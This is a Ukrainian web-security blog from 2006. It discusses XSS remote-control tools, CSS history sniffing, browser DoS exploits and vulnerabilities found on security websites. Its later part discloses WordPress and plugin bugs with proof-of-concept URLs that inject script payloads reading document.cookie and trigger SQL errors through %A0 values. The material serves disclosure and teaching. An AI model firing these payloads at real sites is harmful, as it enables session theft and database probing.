Websecurity - Веб безпека

Тема безпеки Invision Power Board та уразливостей в ньому важлива для мене. Тому що в мене форум на цьому движку.

І тому я прискіпливо слідкую за інформацією про уразливості та експлоіти до IPB.

Остання версія IPB - це Invision Power Board 2.1.7. І раніше я вже писав про уразливість в даній версії IPB.

З того часу з’явилась інформація про нові уразливості в цьому движку. Причому в 2.1.7 та попередніх його версіях. Ось три останніх експлоїта для IPB:

• Exploits Invision Power Board SQL injection (деталі)
• SQL Injection in IPB <=2.1.3 (деталі)
• Invision Power Board Multiple Vulnerabilities (деталі)

Як повідомив RSnake на своєму сайті, вийшла XSS Shell. На що я й звертаю вашу увагу - усіх хто цікавиться темою Cross-Site Scripting, як зі сторони нападу, так і зі сторони безпеки.

XSS Shell - це потужній інструмент для віддаленого контролю за жертвою за допомогою XSS уразливостей. Я вже згадував раніше про можливість підібного в записі Просунутий міжсайтовий скриптінг із віддаленим контролем у реальному часі (для кращого розуміння проблеми варто цю статтю прочитати).

На даний момент можна виділити наступні XSS системи з віддаленим контролем:

• XSS Proxy
• backweb
• BeEF Exploitation Framework
• XSS Shell

В цьому відношенні гострою проблемою стають сайти зомбі. Тому що будь-хто (в браузері з підтримкою java-script), на будь-якому сайті (уразливому до XSS) може стати жертвою хакерської атаки. Тому приділяйте увагу безпеці ваших сайтів.

Як підняв тему RSnake в своєму записі Using CSS to De-Anonymize існує можливість визначити адреси які відвідував користувач (за допомогою Cascading Style Sheets). Тобто зняти анонимність користувача (порушити її).

За допомогою спеціального трюка можна визначити де був даний користувач в своєму браузері, на яких сайтах. В тому числі на яких локальних сайтах. Окрім розкриття конфеденційої інформації (і деанонімізації) користувача, це також може буди використано зловмисником для для проведення комплексних нападів (і зокрема на локальні сайти в локальних мережах).

Для визначення адрес відвіданих сайтів потрібно використати Jeremiah’s CSS trick. Який використовує баг (або фічу) в CSS, для визначення відвіданих користувачем сайтів. Для цього потрібно зробити список (заздалегіть) сайтів, по яким треба зробити перевірку, але це не є проблемою для зловмисника - для вгадання адреси відвіданного сайту.

Я ще планую додатково розповісти про CSS trick для визначення відвіданих сайтів та про атаки на локальні мережі. Це доволі обширна тема, в тому числі в аспекті використання XSS уразливостей разом з даним CSS трюком.

В браузері Firefox 2.0, який нещодавно вийшов, знайдена уразливість, яка призводить до відмови браузеру (DoS).

Уразливими є Firefox версії 1.5.0.7 та нижче, та 2.0. Помилка призводить до Denial of Services (лише DoS, виконання коду не відтверджене).

Як я перевірив в Firefox 2.0 - експлоіт працює, браузер вилітає . При цьому зазначу, що Mozilla 1.7 не вразлива до цієї помилки - дана версія Mozilla не вилітає. В цьому плані стара версія Мозіли перевершила більш нову (найостаннішу) версію Firefox.

Протестуйте ваш браузер: Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit.

Зустрівся меня сьогодні на сайті ha.ckers.org цікавий комікс - PHP CMS XSS.

Про те як помічник MS Office намагається допомогти в написанні CMS на PHP - автоматично вставивши Cross Site Scripting уразливості

Хорошого вам настрою . І вдачних php розробок.

09.09.2006

Як можна було помітити з новин, я знайшов чимало уразливостей на сайтах присвячених темі безпеки.

Це в мене хобі таке з’явилося останнім часом - шукати дири в секюріти сайтах. Окрім загального пошуку уразливостей.

Зокрема уразливості на:

• security.com.ua
• www.catalog-security.com.ua
• www.nsa.gov

Причому ще чимало сайтів з безпеки очікують на те, щоб опинитися в моїх новинах - уразливості на яких я знайшов в серпні й вересні (на додачу до вищезгаданих сайтів). Так що список дирявих сайтів з безпеки буде постійно поповнюватися Така вже тенденція в моїх секюріти дослідженнях.

Тому security сайтам потрібно приділяти увагу власній безпеці.

30.10.2006

Продовжимо тему уразливостей на сайтах про безпеку.

За останній час я виявив проблеми з безпекою на наступних сайтах:

• www.securityfocus.com
• www.cybersecurity.ru
• bezpeka.com

Security проектам потрібно приділяти більше уваги власній безпеці.

12.10.2006

На доданок до вже згадуваної мною теми про Cross-Site Scripting в phplist, повідомлю про ще одну уразливість - в продукті який базується на phplist - це XSS в WP-PHPList.

Як раз вчора, коли проводив деякі додаткові дослідження з приводу поширення phplist в мережі і відповідно наявності великої кількості уразливих сайтів, я виявив що є ще один програмний продукт який також уразливий до даної XSS. Уразлива WP-PHPList 2.10.2 (та попередні версії), яка базується на phplist 2.10.2.

WP-PHPList - це плагін для WordPress, який надає функціональність системи phplist для движка WP.

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам плагіна. Автора phplist я вже сповістив.

29.10.2006

Уразливість в параметрі unsubscribeemail в скрипті wp-phplist.php.

XSS:

http://host/wp-phplist.php?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Автор WP-PHPList так і не відповів мені, і не випустив оновлення свого плагіна. Тому користувачам WP-PHPList потрібно буде власноруч виправити уразливість в плагіні.

Cross-Site Scripting стає все більш поширеним. В своєму записі XSS in Quicktime, як я давно планував розповісти, RSnake згадує про дослідження pdp, стосовно XSS в Quicktime роликах. Як повідомив автор дослідження, він виявив можливість включення коду в Quicktime файл, який будучі розміщеним на веб сторінці, приведе до виконання коду (XSS), при перегляді цієї сторінки відвідувачем.

Про сайт pdp та його дослідження, я вже згадував раніше (gnucitizen.org - блог про веб безпеку).

Зокрема я зверну увагу на дослідження pdp стосовно включення XSS коду в такі об’єкти як Flash та QuickTime:

• Backdooring Flash Objects (the receipt) (деталі)
• Backdooring QuickTime Movies (деталі)

Включення XSS в Flash та QuickTime дозволяє проводити серйозні атаки, і надає додаткових векторів для подібних атак (і може застосовуватися, там де є фільтрація XSS з інших джерел інформації).

Cross-Site Scripting у Flash, тепер ось в Quicktime. Що далі? Вектори XSS атак доволі різноманітні, про що я буду додатково розоповідати.

Новий тест для вашого браузера. На це раз для Mozilla, Firefox та Internet Explorer.

Даний тест повинен привести до припинення роботи вашого браузера (зависне браузер) - це DoS атака. Можете перевірити, чи вразливий саме ваш браузер (вашої версії) до даної атаки. Сам тест представляє собою простенький ява-скрипт, який нагадає вашому браузеру де зимують раки (суть атаки зводиться до генерації максимально можливої кількості вікон браузера - поки він не зависне).

Це трохи інший тест, ніж попередній в IE (Переповнення буфера в Internet Explorer). Не такий ефектний - всього лише DoS. Але зато отдразу в різних браузерах: в Mozilla, Firefox та IE (в Opera не тестував, можете самі перевірити).

Як показали мої перевірки - цей експлоіт підвисає браузери. В мене він підвісив і Mozilla і Firefox. Причому зауважу, що на одному сайті, де я довідався про дану атаку, писалося що вразливий саме Internet Explorer. Але в мене IE не підвісив (IE під XP SP2), зато підвісив Mozilla з Firefox. Лише відкрило масу вікон в IE, забравши частину оперативної пам’яті, але не всю, тому на ПК з меншою кількістю пам’яті, можливий інший ефект. Тому тестуйте свої браузери. І обновлюйте їх, якщо тест покаже невтішні результати.

Протестуйте ваш браузер: Mozilla Firefox IE DoS Exploit.

16.10.2006

До движка WordPress та плагінів під нього в мене особлива і підвищена увага - і я ругялярно провожу аудит безпеки WP (та його плагінів), тому що мій власний сайт базується на даному движку. І можу сказати, що WordPress, в якому нечасто знаходять уразливості (рідко ви про це прочитаєте в новинах секюріті сайтів), і саме за це я і вибрав даний движок, все ж таки має чимало уразливостей.

І чим більше я досліджую його, тим більше уразливостей знаходжу. Особливо уразливими є плагіни (які компроментують движок і сайт у цілому), зокрема плагіни сторонніх розробників, про що в новинах я писав неодноразово, але й в самому движку також є вразливості (і в тому ж плагіні WP-DB Backup, який входить до стандартної поставки движка WP).

До вже згаданих уразливостей в WordPress та його плагінах (Cross-Site Scripting в WP-PHPList, Уразливості в Subscribe To Comments WordPress plugin та Уразливість в Wordpress WP-DB Backup Plugin), я повідомляю про численні уразливості в самому Wordpress (а також в інших плагінах, з числа тих, якими я користуюся, і про що я окремо повідомлю).

Це зокрема Cross-Site Scripting уразливості в адмінці WP, які я зайшов в серпні (3 XSS) і вересні (2 XSS, а також одна SQL DB Structure Extraction). Це лише частина усіх знайдених мною уразливостей в Wordpress (вразливі версії до 2.0.3 включно, і може 2.0.4). Про ті уразливості (й їх чимало), що я знайшов в жовтні, а також про уразливсоті в інших плагінах для WP, я розповім окремо.

Найближчим часом я повідомлю деталі, але спочатку пофіскю ці всі уразливості на своєму сайті (тому за них не переживайте ), а також повідомлю розробникам WordPress і всім тим людям, яким я попередньо вже про ці уразливості розповів, включаючи розробників WP. Зараз залишилося написати їм всім деталі уразливостей (ну і підготую рекомендації по їх виправленню).

17.10.2006

Додам ще про нові уразливості в WordPress (і які мали місце на моєму сайті), про які я також найближчим чамосом повідомлю розробникам цього движка.

Вчора Андрій, який якраз завітав подякувати мені за інформацію про уразливості на його сайті, повідомив мені, що він знайшов дві уразливості в мене на сайті. Що звичайно мене зацікавило . Так от, після отримання детальної інформації від Андрія і перевірки, виявилось що на моєму сайті (в движку WP) є дві уразливості: SQL DB Structure Extraction (а не SQL Injection, як думав Андрій) та XSS - в пошуці по сайту.

Причому він використував дуже хитрий метод пошуку цих уразливостей. Який я планую додатково дослідити - це використання деяких специфічних символів, котрі при деяких випадках можуть привести до виведення помилки в SQL запиті - і відповідно до уразливостей SQL DB Structure Extraction та XSS.

Як я додатково перевірив різні скрипти, які входять до складу движка WordPress (в адмінці і в плагінах), ця уразливість також має місце окрім пошуку по сайту, ще в ряді скриптів. Додатково уразливість проявляється в 5 скриптах - в суммі 8 уразливостей. Враховуючи дві попередні уразливості в пошуку, загалом маємо 10 уразливостей (SQL DB Structure Extraction та XSS). Про них я повідомлю деталі піздніше, після повідомлення розробникам WP. Ці уразливості я вже виправив на сайті, тому за них не переживайте.

Дані уразливості не торкаються всіх сайтів на движку WordPress. Вони спрацьовують лише при деяких налаштуваннях БД (налаштуваннях кодування), які мають місце на моєму сайті, і можуть бути також на деяких інших сайтах. Тому це лише поодинокий випадок, який тим не менш має свої ризики, що при деяких налаштуваннях MySQL, може відбуватися помилка в запиті до БД, що приводить до уразливостей (XSS + SQL DB Structure Extraction).

Детальна інформація.

Знайдено 24.08.2006.

XSS:

http://site/wp-admin/templates.php?file=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 29.08.2006.

XSS:

http://site/wp-admin/inline-uploading.php?action=upload&all=true&start=-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/inline-uploading.php?action=upload&all=true%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 01.09.2006.

XSS:

POST запит на сторінці http://site/wp-admin/link-import.php
<script>alert(document.cookie)<script>В полі: Вкажіть OPML URL.

Знайдено 16.09.2006.

XSS:

http://site/wp-admin/edit.php?m=&paged=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 27.09.2006.

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?paged=-1

Знайдено 17.10.2006.

Дані уразливості працюють лише при специфічній конфігурації кодування на сайті (при специфічних налаштуваннях БД, в даному випадку MySQL). Коли на сайті наявне UTF-8 кодування, в БД встановлене інше кодування (наприклад, Windows-1251) і в коді движка задане примусове встановлення UTF-8 кодування.

SQL DB Structure Extraction:

http://site/?s=%A0
http://site/wp-admin/edit.php?s=%A0
http://site/wp-admin/edit-pages.php?s=%A0
http://site/wp-admin/edit-comments.php?s=%A0

XSS:

http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-pages.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-comments.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?page=subscribe-to-comments.php&email=%A0
http://site/wp-subscription-manager.php?page=subscribe-to-comments.php&email=%A0